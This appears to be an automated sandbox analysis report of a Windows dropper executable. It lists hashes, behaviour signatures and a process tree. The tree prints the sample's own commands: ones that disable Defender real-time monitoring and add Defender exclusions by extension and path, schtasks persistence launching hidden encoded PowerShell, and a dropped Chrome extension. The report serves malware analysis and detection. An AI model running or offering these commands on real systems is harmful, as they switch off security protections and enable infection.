Analysis

  • max time kernel
    143s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    15/07/2024, 05:12

General

  • Target

    9063f784e036fc5c2475b3c174c250ce209f240dab4ef2e3498aa456e117c3e4.exe

  • Size

    7.3MB

  • MD5

    2af213f0bbd19153802b8901fb0203c5

  • SHA1

    1f510341ac0d2269e621bdd63b019a178347b4d1

  • SHA256

    9063f784e036fc5c2475b3c174c250ce209f240dab4ef2e3498aa456e117c3e4

  • SHA512

    9d4f3f869cec6d5c3f13e733d4abccf94be37bda8d1aaa3070b9a573a14689a406cd0f743ccf4af4e9bf226ca13e239c2e54ad9d633db59b4a7e26ea090478b8

  • SSDEEP

    196608:91OeDTW1qt8oA5h2hkvJa39Wk5CVBWXHgShugXS5ZD9:3OoFaEhkva98BWXHJ1i5n

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9063f784e036fc5c2475b3c174c250ce209f240dab4ef2e3498aa456e117c3e4.exe
    "C:\Users\Admin\AppData\Local\Temp\9063f784e036fc5c2475b3c174c250ce209f240dab4ef2e3498aa456e117c3e4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\7zSEB97.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Users\Admin\AppData\Local\Temp\7zSEFCB.tmp\Install.exe
        .\Install.exe /xYWFkdidVnfIZ "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2752
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2944
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 05:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\GynPykT.exe\" Ij /RSqXdidd 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2548
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 636
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2008
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9712B42B-9A7E-4093-A979-5F0E5C39BE1E} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\GynPykT.exe
      C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\GynPykT.exe Ij /RSqXdidd 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gNAUKxNOa" /SC once /ST 01:05:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1508
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gNAUKxNOa"
        3⤵
          PID:2820
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gNAUKxNOa"
          3⤵
            PID:2872
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:584
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:852
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:2376
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1052
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gpFgMlHMu" /SC once /ST 01:04:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1104
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gpFgMlHMu"
                3⤵
                  PID:1900
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gpFgMlHMu"
                  3⤵
                    PID:2416
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:1924
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:1584
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1944
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2220
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:540
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:2680
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:2640
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:1724
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2060
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2516
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2520
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2744
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\bpNowFaEeWbSfYmu\ELodOdjR\khMlSLOaIvEZsPfn.wsf"
                                    3⤵
                                      PID:1192
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\bpNowFaEeWbSfYmu\ELodOdjR\khMlSLOaIvEZsPfn.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2752
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2016
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2604
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2196
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1552
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2568
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3036
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1616
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1296
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2480
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1632
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2620
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:924
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1972
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1604
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1984
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3020
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2044
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2344
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2968
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:2932
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:820
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2864
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2064
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2072
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2228
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:1608
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:584
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1800
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1600
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2304
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2900
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:1744
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:380
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1992
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2092
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:996
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gCuSXTcoG" /SC once /ST 00:44:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1636
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gCuSXTcoG"
                                                                          3⤵
                                                                            PID:1672
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gCuSXTcoG"
                                                                            3⤵
                                                                              PID:2724
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:3016
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2104
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2528
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2652
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 02:53:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\itXLawT.exe\" MC /UxDbdidVj 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2956
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "fxxmGIjnSbKlnnNZc"
                                                                                      3⤵
                                                                                        PID:2488
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 232
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2540
                                                                                    • C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\itXLawT.exe
                                                                                      C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\itXLawT.exe MC /UxDbdidVj 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:2556
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"
                                                                                        3⤵
                                                                                          PID:3036
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:2848
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2684
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2700
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:888
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
